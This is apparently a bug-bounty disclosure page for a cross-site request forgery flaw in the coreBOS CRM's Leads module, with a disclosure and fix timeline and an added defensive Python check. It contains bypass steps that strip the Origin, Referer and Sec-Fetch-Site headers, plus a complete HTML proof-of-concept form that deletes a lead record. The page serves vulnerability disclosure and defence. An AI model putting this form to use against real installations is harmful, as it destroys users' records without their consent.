Cross-Site Request Forgery (CSRF) in tsolucio/corebos


Reported on Jul 21st 2022


CSRF is still possible on the Leads module

A detailed video is attached as proof of concept.

Tested from: Firefox

URL of Demo :

Proof of Concept

Video Link :

Steps Involved

  1. Create one & after that, intercept the request
  2. Capture the delete request
  3. Remove the headers: Origin, Referer, Sec-Fetch-Site
  4. Add <meta name="referrer" content="no-referrer"> with CSRF-PoC
  5. Done


  <script>history.pushState('', '', '/')</script>
  <form action="" method="POST">
    <input type="hidden" name="&#95;&#95;vt5rftk" value="sid&#58;b523b60fa9a701abf87cd1d76a6facf8ac8f83a0&#44;1658428539" />
    <input type="hidden" name="allselectedboxes" value="" />
    <input type="hidden" name="from&#95;link" value="DetailView" />
    <input type="hidden" name="cbfromid" value="44845" />
    <input type="hidden" name="module" value="Leads" />
    <input type="hidden" name="record" value="44845" />
    <input type="hidden" name="isDuplicate" value="false" />
    <input type="hidden" name="action" value="Delete" />
    <input type="hidden" name="return&#95;module" value="Leads" />
    <input type="hidden" name="return&#95;id" value="" />
    <input type="hidden" name="return&#95;action" value="index" />
    <input type="hidden" name="lead&#95;id" value="44845" />
    <input type="hidden" name="parent&#95;id" value="44845" />
    <input type="hidden" name="email&#95;directing&#95;module" value="" />
    <input type="hidden" name="emailids" value="44845&#64;46&#124;" />
    <input type="hidden" name="pmodule" value="Leads" />
    <input type="hidden" name="cbcustominfo1" value="" />
    <input type="hidden" name="cbcustominfo2" value="" />
    <meta name="referrer" content="no-referrer">
    <input type="submit" value="Submit request" />
  </form>


Cross-site request for the deletion of leads
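The steps above work because the server treats a request with no Origin, no Referer and no Sec-Fetch-Site header as if it were same-origin. The check below is an added, defender-side illustration of the fail-closed alternative; it is not coreBOS code and not the fix shipped in commit d0bf45. The deployment origin, the session store layout and the csrf_token field name are assumptions made for the example; the three header names are the standard ones named in the report.

```python
import hmac
from typing import Optional
from urllib.parse import urlsplit

# Assumed deployment origin of the CRM (constructed for this example).
SITE_ORIGIN = "https://crm.example.test"


def origin_of(url: str) -> Optional[str]:
    """Return scheme://host[:port] of an absolute URL, or None if it has none."""
    p = urlsplit(url)
    if not p.scheme or not p.netloc:
        return None
    return f"{p.scheme}://{p.netloc}".lower()


def same_site_by_headers(headers: dict) -> bool:
    """Fail-closed request-source check.

    Precedence: Sec-Fetch-Site (set by the browser, not by page content),
    then Origin, then Referer. If none of the three is present the request
    is rejected: a PoC that strips all three must not be treated as trusted.
    """
    h = {k.lower(): v for k, v in headers.items()}
    sfs = h.get("sec-fetch-site")
    if sfs is not None:
        # 'none' is a user-initiated navigation (typed URL, bookmark).
        return sfs in ("same-origin", "none")
    origin = h.get("origin")
    if origin is not None:
        return origin.lower() == SITE_ORIGIN
    referer = h.get("referer")
    if referer is not None:
        return origin_of(referer) == SITE_ORIGIN
    return False  # no provenance at all: deny the state change


def token_valid(form: dict, session: dict) -> bool:
    """Per-session synchronizer token, compared in constant time."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def allow_state_change(method: str, headers: dict, form: dict, session: dict) -> bool:
    """Safe methods pass; state-changing methods need BOTH defences to hold."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True
    return same_site_by_headers(headers) and token_valid(form, session)


# Constructed sample requests mirroring the report: a stripped-header POST
# (step 3 above), a legitimate in-app delete, and a cross-site form post.
SESSION = {"csrf_token": "s3ss10n-t0k3n"}  # constructed value
SAMPLE_REQUESTS = {
    "stripped_headers": (
        "POST",
        {"Content-Type": "application/x-www-form-urlencoded"},
        {"module": "Leads", "action": "Delete", "csrf_token": "s3ss10n-t0k3n"},
    ),
    "legitimate_delete": (
        "POST",
        {"Sec-Fetch-Site": "same-origin", "Origin": SITE_ORIGIN},
        {"module": "Leads", "action": "Delete", "csrf_token": "s3ss10n-t0k3n"},
    ),
    "cross_site_post": (
        "POST",
        {"Sec-Fetch-Site": "cross-site", "Origin": "https://attacker.example.test"},
        {"module": "Leads", "action": "Delete", "csrf_token": "s3ss10n-t0k3n"},
    ),
    "referer_only_same_origin": (
        "POST",
        {"Referer": SITE_ORIGIN + "/index.php?module=Leads&action=DetailView"},
        {"module": "Leads", "action": "Delete", "csrf_token": "s3ss10n-t0k3n"},
    ),
    "detail_view_get": ("GET", {}, {"module": "Leads", "action": "DetailView"}),
}


def evaluate_samples() -> dict:
    """Run every sample through the gate; True means the request is allowed."""
    return {
        name: allow_state_change(method, headers, form, SESSION)
        for name, (method, headers, form) in SAMPLE_REQUESTS.items()
    }


if __name__ == "__main__":
    for name, allowed in evaluate_samples().items():
        print(f"{name:26s} -> {'ALLOW' if allowed else 'DENY'}")
```

The important branch is the final `return False` in `same_site_by_headers`: an allow-list that only fires when a header is present silently degrades to "allow everything" once the header is gone, which is exactly what the `no-referrer` meta tag and the stripped Origin achieve here. Pairing the header check with a per-session token keeps a single bypass from being sufficient.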

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 4 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 4 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 3 months ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP
3 months ago


@maintainer @admin

After fixing, can we track it as a CVE?

We have sent a fix follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE